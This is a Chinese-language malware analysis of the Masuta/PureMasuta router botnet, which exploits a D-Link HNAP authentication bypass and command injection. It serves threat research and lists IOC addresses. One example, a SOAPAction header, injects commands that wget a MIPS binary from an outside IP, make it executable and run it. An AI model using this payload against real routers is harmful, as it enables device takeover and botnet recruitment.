0x00 概述
Satori的威胁背后是新的Masuta僵尸网络,目标是野外路由器.
Masuta僵尸网络使用默认凭据作为目标路由器,被分析的一个版本称为“PureMasuta”,依赖于旧的网络管理EDB 38722 D-Link漏洞利用。
0x10 研究发现
NewSky的安全专家认为,最近发现的Satori僵尸网络的运营商正在发起一个新的大规模黑客攻击行动,针对路由器在僵尸网络中感染和招募他们。
“我们分析了一个名为”Masuta“的物联网僵尸网络的两个变种,我们观察到一个众所周知的物联网威胁参与者的参与,并发现了一个在僵尸网络运动中首次被武装化的路由器利用。”
“我们能够在只有黑暗的论坛上获得Masuta(日语为”主“)僵尸网络的源代码。在分析配置文件之后,我们看到Masuta使用0xdedeffba而不是Mirai的0xdeadbeef作为密钥的种子,因此配置文件中的字符串被((DE ^ DE)^ FF)^ BA或0x45有效地存储。 ”
Satori僵尸网络是由MalwareMustDie专家组首次发现的Mirai僵尸网络的一个变体,它在2016年底成为头条新闻,涉及数十万次尝试利用华为HG532家庭路由器中最近发现的一个漏洞。
Masuta还使用默认凭据作为目标路由器,被称为“PureMasuta”的专家分析的版本之一依赖于旧的网络管理EDB 38722 D-Link漏洞利用。
研究人员注意到自9月份以来Masuta攻击事件有所增加,他们的蜜罐在过去三个月中观察到涉及僵尸网络的2400个IP,专家认为其他路由器将在未来几个月内被利用。
研究人员Craig Heffner在2015年发现了由EDB 38722 D-Link漏洞触发的漏洞,它影响了D-Link的家庭网络管理协议。
0x20 漏洞原理
“PureMasuta僵尸网络中引入的漏洞基于HNAP(家庭网络管理协议)中,该协议本身基于SOAP协议。”NewSky发表的分析报告表明:
“通过使用hxxp://purenetworks.com/HNAP1/GetDeviceSettings可以创建一个可以绕过认证的SOAP查询。 另外,由于不正确的字符串处理,运行系统命令(导致任意代码执行)是可行的。 当两个问题结合在一起时,可以形成一个首先绕过认证的SOAP请求,然后导致任意代码执行。“
专家解释,像下面这样的字符串将导致重新启动
SOAPAction: “hxxp://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`”攻击者可以在“GetDeviceSettings”之后运行任何命令,这个机制被puremasuta BOT用来运行
wget来获取并运行一个shell脚本并接管目标路由器。
0x21 示例
利用该漏洞,在Linux服务器 tmp目录下,下载jennifer.mips的二进制文件,并赋予执行权限,最后运行该二进制文件。
SOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp
&& wget http://5.39.22.8/jennifer.mips ;chmod +x jennifer.mips ;./jennifer.mips`0x30 IOC
专家们注意到,PureMasuta变体使用的命令和控制服务器(IP:93.174.93.63)与原始Masuta变体中使用的相同,这意味着PureMasuta是由相同威胁参与者操作的僵尸网络的演变。
NewSky将Masuta僵尸网络归类为一个名为“Nexus Zeta”的实体,该名称来自C&C URL nexusiotsolutions(dot)网络,该URL与Satori僵尸网络使用的相同。
purenetworks.com
93.174.93.63
67.20.177.160
85.17.73.233